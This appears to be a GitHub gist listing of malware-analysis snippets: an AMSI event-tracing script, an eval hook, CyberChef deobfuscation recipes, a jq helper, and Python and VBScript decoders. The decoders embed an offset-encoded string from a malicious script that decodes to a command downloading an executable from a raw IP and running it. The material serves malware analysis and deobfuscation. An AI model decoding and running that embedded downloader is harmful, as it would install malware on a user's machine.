I hereby claim:
- I am edygert on github.
- I am evandygert (https://keybase.io/evandygert) on keybase.
- I have a public key ASCHN0leVSTiw22_e9JZ3Zjb8hXBgFvydCRe5Gpi_pGkFgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# Script author: Matt Graeber (@mattifestation) | |
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
# Do your malicious things here that would be logged by AMSI | |
# logman stop AMSITrace -ets | |
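# Pointer width (in bits) of the installed OS, taken from Win32_OperatingSystem.
# $OSArchProperty / $OSArch are kept as separate variables because later code
# in the file may reference them.
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture
$OSPointerSize = 32
# OSArchitecture is reported as '64-bit' on x64 and as 'ARM 64-bit' on ARM64;
# a wildcard match covers both, where the exact '-eq' comparison left ARM64
# hosts at 32.
if ($OSArch -like '*64-bit') { $OSPointerSize = 64 }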
# Emit each entry of $AMSIScanEvents once, keyed on its Hash property.
# $Seen records every hash already written to the pipeline.
$Seen = @{}
foreach ($elem in $AMSIScanEvents) {
    # Skip events whose hash has already been emitted
    if ($Seen.ContainsKey($elem.Hash)) { continue }
    Write-Output $elem
    $Seen[$elem.Hash] = ""
}
# Start an ETW trace session for the AMSI provider (keyword Event1), written to AMSITrace.etl
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Run the script under analysis while the trace is active
cscript loveyou.js
# Stop the trace session
logman stop AMSITrace -ets
# Extract the scanned script content from the trace into loveyou.log
# (AMSIScriptContentRetrieval is defined elsewhere in the script)
AMSIScriptContentRetrieval > loveyou.log
Event1 was found using the following: | |
logman query providers Microsoft-Antimalware-Scan-Interface |
#!/usr/bin/env python3 | |
# Encoded strings: runs of 3-digit decimal groups, each a character code
# offset by +26 (reversed by decode() below).
sp_ll = "125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085"
e_mo = "113141125140131138142072109130127134134"
def decode(s): | |
result = "" | |
for n in range(0, len(s), 3): | |
ch = chr(int(s[n:n+3]) - 26) |
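// Hook the host's eval so every string handed to it is echoed to the
// console before being evaluated; used to trace what obfuscated script
// code actually passes to eval.
original_eval = eval;
eval = function(input_string) {
    WScript.Echo(input_string);
    // Return the evaluated value so callers that use eval's result
    // (e.g. `x = eval(...)`) keep working; the original hook dropped it.
    return original_eval(input_string);
}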
Regular_expression('User defined','[a-zA-Z0-9+/=]{40,}',true,true,false,false,false,false,'List matches') | |
From_Base64('A-Za-z0-9+/=',true) | |
Decode_text('UTF-16LE (1200)') | |
Regular_expression('User defined','[a-zA-Z0-9+/=]{20,}',true,true,false,false,false,false,'List matches') | |
From_Base64('A-Za-z0-9+/=',true) | |
Gunzip() | |
Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches') | |
From_Base64('A-Za-z0-9+/=',true) | |
XOR({'option':'Decimal','string':'35'},'Standard',false) |
' Encoded strings: runs of 3-digit decimal groups, each a character code
' offset by +26; B_RA (below) reverses the offset.
E_MO = "113141125140131138142072109130127134134"
SP_LL ="125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085"
' Print the decoded text of each string
WScript.Echo B_RA(E_MO)
WScript.Echo B_RA(SP_LL)
Public Function B_RA(byref N_UN) | |
For O_MI = 1 To Len(N_UN) Step 3 | |
A_DE = Mid(N_UN, O_MI, 3) | |
C_YS = C_YS + Chr(int(A_DE) - 26) |
Regular_expression('User defined','Hextostring\\(\\"[^"]+\\"\\), Hextostring\\(\\"[^"]+\\"\\)',true,true,false,false,false,false,'List matches') | |
Fork('\\n','\\n',false) | |
Register('Hextostring\\(\\"([^"]+)\\"\\), Hextostring\\(\\"([^"]+)\\"\\)',true,false,false) | |
Find_/_Replace({'option':'Regex','string':'^.*$'},'$R0',true,false,true,false) | |
From_Hex('Auto') | |
XOR({'option':'Hex','string':'$R1'},'Standard',false) |
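# Emit one jq path expression per path in the input (".a", ".a[].b", ...),
# with array indices collapsed to "[]" so each structural path appears once.
paths
# ["a", 0, "b"] -> "a.0.b"
| join(".")
# Drop paths that go through any array index other than 0; index 0 stands
# in for "every element". Note "[.|$]?" is an optional character class, not
# an alternation, so the test is effectively "contains .N" for N >= 1.
| select(test("[.][1-9][0-9]*[.|$]?") | not)
# Rewrite each ".0" that is followed by another segment as "[]". The
# lookahead leaves the following "." unconsumed so adjacent indices
# (".0.0.") are all rewritten; the previous "[.]0[.]" pattern consumed the
# separator and left the next ".0" untouched (e.g. "c.0.0.d" -> "c[].0.d").
| gsub("[.]0(?=[.])"; "[]")
# Trailing ".0" -> "[]"
| sub("[.]0$"; "[]")
# Prefix the leading "." of a jq path
| sub("^"; ".")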